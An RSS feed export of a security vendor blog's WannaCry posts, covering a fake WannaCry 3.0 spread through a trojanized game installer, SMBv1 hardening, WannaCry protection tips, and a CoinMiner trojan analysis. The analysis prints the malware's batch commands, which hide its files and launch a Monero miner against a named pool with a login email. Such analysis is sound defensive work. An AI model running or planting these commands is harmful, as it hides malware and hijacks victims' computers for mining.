WannaCry Archives – Gridinsoft Blog https://gridinsoft.com/blogs/tag/wannacry/ Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe. Fri, 06 Oct 2023 05:32:35 +0000 en-US hourly 1 https://wordpress.org/?v=80075 200474804 WannaCry 3.0 Ransomware Aims At Enlisted Russian-speaking Players https://gridinsoft.com/blogs/russian-speaking-enlisted-players/ https://gridinsoft.com/blogs/russian-speaking-enlisted-players/#respond Fri, 16 Jun 2023 10:48:50 +0000 https://gridinsoft.com/blogs/?p=15387 A previously unknown payload of ransomware, that call itself WannaCry 3.0, targets Russian-speaking players of the Enlisted game. Hackers reportedly use a modified game installer and a spoofed official site to confuse unsuspecting users. You might also be interested in this article One Year of Russian-Ukrainian War in Cybersecurity, or this: Stabbed in the back:… Continue reading WannaCry 3.0 Ransomware Aims At Enlisted Russian-speaking Players

The post WannaCry 3.0 Ransomware Aims At Enlisted Russian-speaking Players appeared first on Gridinsoft Blog.

]]>
A previously unknown payload of ransomware, that call itself WannaCry 3.0, targets Russian-speaking players of the Enlisted game. Hackers reportedly use a modified game installer and a spoofed official site to confuse unsuspecting users.

You might also be interested in this article One Year of Russian-Ukrainian War in Cybersecurity, or this: Stabbed in the back: Chinese Mustang Panda Cyberspies Attack Russian Officials.

Also information security specialists noted that Due to the sanctions, Russian hackers are looking for new ways to launder money.

How hackers mimic the Enlisted game

Trojanized versions of the game are distributed through fake sites, where the game installer comes with a ransomware that pretends to be the third version of the sensational WannaCry malware (the malware even changes the extensions of the affected files to .wncry).

Russian-speaking Enlisted players
Fake site that mimics the official page of the game

Enlisted was released by Gaijin Entertainment in 2021 and has between 500,000 and a million active players every month. Since the game is free-to-play, the attackers were able to easily download the installer from the publisher’s website and modify it to distribute the malware to players.

WannaCry 3.0 Payload analysis

According to Cyble analysts who analyzed the threat, this supposedly new variant of WannaCry is actually based on an open-source Python locker Crypter created for educational purposes. The game installer downloaded from the fake site is named “enlisted_beta-v1.0.3.115.exe“, and when run, it dumps two executable files on the user’s disk: ENLIST~1 (the actual game) and enlisted (the malware’s Python launcher).

Russian-speaking Enlisted players
Game setup launched window

Upon initialization, the ransomware creates a mutex to avoid multiple running instances on the infected machine. It then parses its JSON config file to determine which file types to target, which directories to skip, which ransom note to generate, and which wallet address to enter to receive the ransom.

Json config malware
JSON configuration file used by malware

As a result, the ransomware scans the working directory looking for the key.txt file to use in the encryption step (if it does not exist, it creates it). The AES-256 algorithm is used for encryption, and as mentioned above, all locked files receive the .wncry extension.

WannaCry ransom note
Ransom note of WannaCry 3.0, that tries to resemble the original WannaCry’s notes

Interestingly, the malware does not attempt to terminate processes or services, which is standard practice in modern lockers, but goes the usual way for ransomware and removes shadow copies to prevent data recovery.

After verifying the process of encrypting files, the ransomware shows the victim a ransom note using a special application with a graphical interface for this and giving the victim three days to make a decision. In case the victim’s antivirus blocks the display of the ransom note, the ransomware also changes the background image on the user’s work slot.

Russian-speaking Enlisted players

What then?

The researchers note that the hackers do not use the Tor website, instead suggesting that victims use a Telegram bot to contact them. According to experts, many popular online shooters may now be unavailable to Russian users, so Enlisted has become an alternative for them. If the attackers have already paid attention to this, they can probably create other fake sites for similar games with Russian localization.

Well, what can I say? Being Russian-speaking now is not something that is not fashionable, but also dangerous. However, cybercriminals must be detected and punished, despite extenuating circumstances.

The post WannaCry 3.0 Ransomware Aims At Enlisted Russian-speaking Players appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/russian-speaking-enlisted-players/feed/ 0 15387
Microsoft recommends Exchange administrators to disable SMBv1 https://gridinsoft.com/blogs/microsoft-recommends-exchange-administrators-to-disable-smbv1/ https://gridinsoft.com/blogs/microsoft-recommends-exchange-administrators-to-disable-smbv1/#respond Thu, 13 Feb 2020 16:45:01 +0000 https://blog.gridinsoft.com/?p=3458 Microsoft strongly recommends administrators disable the SMBv1 protocol on Exchange servers to protect against threats that exploit its vulnerabilities. Let me remind you that Microsoft has been implementing a systematic refusal to use the outdated SMBv1 for a long time. So, since 2016, the company has advised administrators to withdraw from SMBv1 support since this… Continue reading Microsoft recommends Exchange administrators to disable SMBv1

The post Microsoft recommends Exchange administrators to disable SMBv1 appeared first on Gridinsoft Blog.

]]>
Microsoft strongly recommends administrators disable the SMBv1 protocol on Exchange servers to protect against threats that exploit its vulnerabilities.

Let me remind you that Microsoft has been implementing a systematic refusal to use the outdated SMBv1 for a long time. So, since 2016, the company has advised administrators to withdraw from SMBv1 support since this version of the protocol is almost 30 years old and does not contain the security improvements that were added in later versions.

Security enhancements include encryption, integrity checks before authentication to prevent man-in-the-middle (MiTM) attacks, blocking insecure guest authentication, and more.

To make sure that your Exchange organization is better protected against the latest threats (for example Emotet, TrickBot or WannaCry to name a few) we recommend disabling SMBv1 if it’s enabled on your Exchange (2013/2016/2019) server. There is no need to run the nearly 30-year-old SMBv1 protocol when Exchange 2013/2016/2019 is installed on your system. SMBv1 isn’t safe and you lose key protections offered by later SMB protocol versionsrecommend in Microsoft

Now the Exchange Team has once again reminded administrators of the insecurity of using SMBv1 because various malware still actively abuses them. Some vulnerabilities in SMB are exploited by EternalBlue and EternalRomance, as well as by TrickBot, Emotet, WannaCry, Retefe, NotPetya, Olympic Destroyer, and so on. In addition, known SMB problems can be used to spread the infection to other machines, perform destructive operations, and steal credentials.

In this regard, Microsoft experts strongly recommend disabling the obsolete version of SMB on Exchange 2013/2016/2019 servers.

Before disabling SMBv1, you should make sure you use a correctly configured and supported DAG witness server which supports at least SMBv2. You should make sure that the witness server is running a supported version of Windows Server, which is Windows Server 2012/2012R2/2016 or 2019recommended in Microsoft

The company says they did not check if the Exchange 2010 server was working correctly with SMBv1 disabled. And they are advised to upgrade from Exchange 2010 to Office 365 or a newer version of Exchange Server.

On this week, as part of the “Tuesday of updates” Microsoft fixed 99 bugs in its relatively products, including the sensational 0-day in Internet Explorer, but at the same time, the discontinuation of support for old products causes a very mixed reaction from users.

The post Microsoft recommends Exchange administrators to disable SMBv1 appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/microsoft-recommends-exchange-administrators-to-disable-smbv1/feed/ 0 3458
What is Trojan CoinMiner csrss.exe? https://gridinsoft.com/blogs/trojan-coinminer-csrss-exe/ https://gridinsoft.com/blogs/trojan-coinminer-csrss-exe/#respond Wed, 21 Jun 2017 10:10:36 +0000 https://blog.gridinsoft.com/?p=351 Csrss.exe (also known as Client Service Runtime Process) is a legitimate and vital process of Microsoft Windows OS. The genuine csrss.exe file is located in “C:\Windows\System32\” and it is normal to see it running in Task Manager since it is an essential part of the operating system. But… The owner of such infected computers may… Continue reading What is Trojan CoinMiner csrss.exe?

The post What is Trojan CoinMiner csrss.exe? appeared first on Gridinsoft Blog.

]]>
Csrss.exe (also known as Client Service Runtime Process) is a legitimate and vital process of Microsoft Windows OS. The genuine csrss.exe file is located in “C:\Windows\System32\” and it is normal to see it running in Task Manager since it is an essential part of the operating system. But…

The owner of such infected computers may notice that some processes in their system use a lot of CPU %, which often slow down the computer or even freeze it completely. The main problem with a miner program is using your PC to make money.

Small overheat you say?
Small overheat you say?

It can be just a slow down of the computer for the average user, but be careful. If you ignore this problem, you can lose part of your PC because of overheating. So if you notice that CPU temperatures are over 50 degrees, then be ready that someone is already using your PC for mining.

srvanyx.exe

Such viruses can often be downloaded from the Internet by the users themselves. Often when users open unknown files from the spam message, they infect the computer with different kinds of virus-like malware or adware. But the developer usually has a plan B. They attach similar viruses to installing various free programs; hence, if you skip the installation process and don’t look to the advantage setting, then ready that your computer will be infected with virus-like this.

We discovered a sample of Trojan.CoinMiner written in Delphi, which is distributed via spam mail:

Trojan Coin Miner PEiD v0.95

GridinSoft Antim-Malware detect it as “Trojan.Win32.CoinMiner.dd” (like on image below):
Trojan.Win32.CoinMiner.dd

MD5: 922e0891ae30ac3adb3a09cb963570cc
SHA1: 77feeefff422519cdb63faa438fea87e5e70882a

Other antivirus programs detect Trojan.CoinMiner (csrss.exe) as:

DrWeb Trojan.Hosts.6838
Emsisoft Trojan.Agent.CEQQ (B)
ESET-NOD32 a variant of Win64/BitCoinMiner.AP potentially unsafe
Kaspersky not-a-virus:RiskTool.Win64.BitCoinMiner.cev

The trojan miner creates the next folder:

C:\Windows\MicrosoftU

And create these files:

  • Auto.bat
  • Start.vbs
  • Start2.vbs
  • Hide.bat
  • Start.bat
  • Start2.bat
  • 1.bat
  • 2.bat
  • Srvany.exe
  • Csrss.exe
  • Srvanyx.exe

After Trojan.CoinMiner has been unpacked. It hides its presence using the strings in Hide.bat, setting the hidden and system attributes to the folder and files.

Attrib C:\Windows\MicrosoftU + S + H / S / D
Attrib C:\Windows\MicrosoftU\*. * + S + H / S / D

“Ttrojan Miner” uses the name of one of the system files “csrss.exe” to hide its presence in the system.

The virus starts with the following parameters:

Stratum + tcp: //xmr.pool.minergate.com: 45560 – Resource for which “mining” will be entered
Tatyana.kostomarova@gmail.com – user login from whom the extraction will be introduced
Cryptonight – Mining algorithm

Another parameter is how many threads the program will work in. This “miner” has a formula for calculating the number of processor cores involved. It is in the .bat file that launches the “miner” for the first time:

Set / a CPU =% NUMBER_OF_PROCESSORS% / 2 + 1
Srvanyx -a cryptonight -o stratum + tcp: //xmr.pool.minergate.com: 45560 -u tatyana.kostomarova@gmail.com -p x -t% cpu%
tadjukbm Trojan.CoinMiner
Nah, it’s fine, the computer just a slily slow down

Another good miner example – Adylkuzz. This miner used SMB vulnerability for several weeks, and this is a similar vulnerability that uses widespread WannaCry (Wana Decrypt0r) which infected millions of computers last week. The main difference between those two viruses is that Adylkuzz miner hides as deep as possible and uses computer performance to mine Bitcoin and WCry (Wana Decryptor) aggressively encrypt data on the user’s computer.
msiexec.exe

Moreover, the researchers are sure that the malicious Adylkuzz miner infected the computer much earlier than WannaCry, on May 2, 2017. Adylkuzz did not attract as much attention as the Wana Decrypt0r (Wanacry Ransomware) for the simple reason that it is much more challenging to notice infection in this case. The only “symptoms” that the victim can see is the slowdown of the PC, as the miner uses the system’s resources. In addition, specialists say that Adylkuzz protected its users from WannaCry ransomware attacks. After the miner infects the user’s computer, it closes the “hole” in SMB and does not allow other malware to use the gap.

Trojan Coin Miner REMOVAL
The specialists of both companies remind everyone who has not yet installed the update MS17-010, which closes the gap in SMB, that it should be done immediately and near the 445 port.

The miners are worth noting that the program used only for “mining” does not carry a direct threat but can be used for undesirable actions. Therefore, we highly recommend you to download and scan your PC with professional anti-malware tool and clean up your PC.

The post What is Trojan CoinMiner csrss.exe? appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/trojan-coinminer-csrss-exe/feed/ 0 351
How to protect your PC from a virus, that has infected systems all around the world? Be careful, WannaCry may come for you! https://gridinsoft.com/blogs/protect-pc-virus-infected-systems-around-world-careful-wannacry-may-come/ https://gridinsoft.com/blogs/protect-pc-virus-infected-systems-around-world-careful-wannacry-may-come/#comments Sat, 13 May 2017 10:25:08 +0000 https://blog.gridinsoft.com/?p=328 I think you’ve already heard about this virus. For the past few days, it spread to computers in 74 counties! The biggest impact we can see is in China, Russia, Peru, France, and Canada. In only one day it infected German rail stations, Chinese Universities, the Russian Interior Ministry, British hospitals, and other government institutions.… Continue reading How to protect your PC from a virus, that has infected systems all around the world? Be careful, WannaCry may come for you!

The post How to protect your PC from a virus, that has infected systems all around the world? Be careful, WannaCry may come for you! appeared first on Gridinsoft Blog.

]]>
I think you’ve already heard about this virus. For the past few days, it spread to computers in 74 counties! The biggest impact we can see is in China, Russia, Peru, France, and Canada. In only one day it infected German rail stations, Chinese Universities, the Russian Interior Ministry, British hospitals, and other government institutions. Impressive, isn’t it?

Train station hacked
German train station

How WannaCry (or Wanna Decrypt0r 2.0) is spreading and what is it capable of?

You can infect a PC by downloading some pirate programs, clicking on suspicious pop-ups with fake “update” links, and via emails. Be careful before clicking on some attachments and running programs from an unknown source.

Wanna Cry in the university
Wanna Cry in the university

When it infects your PC it will scan all files and encrypt them with WNCRY extension. Access is blocked to images, documents, music, and system files. After that, you will see the message on the screen “Oops, your files have been encrypted” and demand to pay $300 in Bitcoins to decrypt your files. However, no one guarantees that after paying the ransom the files will be decrypted.

Wannacry virus demand
Wannacry virus

To ensure that this epidemic bypasses you immediately need to install the patch MS17-010 from Microsoft. After installation, restart the computer. You need to scan your PC and in the case of detection of malicious attacks (Trojan.Win64.EquationDrug.gen) – reboot the system again and make sure that the patch MS17-010 is installed.

If you are already infected follow the steps below to eliminate the virus.

  1. It is necessary to enable the safe mode with the network drivers loaded.
  2. Then you need to scan the system with a strong antivirus program and remove all detected files

The final step for the user is to restore the encrypted files, you can only do this after Wannacry is uninstalled. Otherwise, system files and the registry can be damaged. For this, you can try different decryption programs, but they don’t guarantee to restore files.

So as we can see viruses don’t sleep and are evolving every day. WannaCry will be on our next list of the top 10 viruses.

How to protect your PC from a virus, that has infected systems all around the world? Be careful, WannaCry may come for you!

The post How to protect your PC from a virus, that has infected systems all around the world? Be careful, WannaCry may come for you! appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/protect-pc-virus-infected-systems-around-world-careful-wannacry-may-come/feed/ 1 328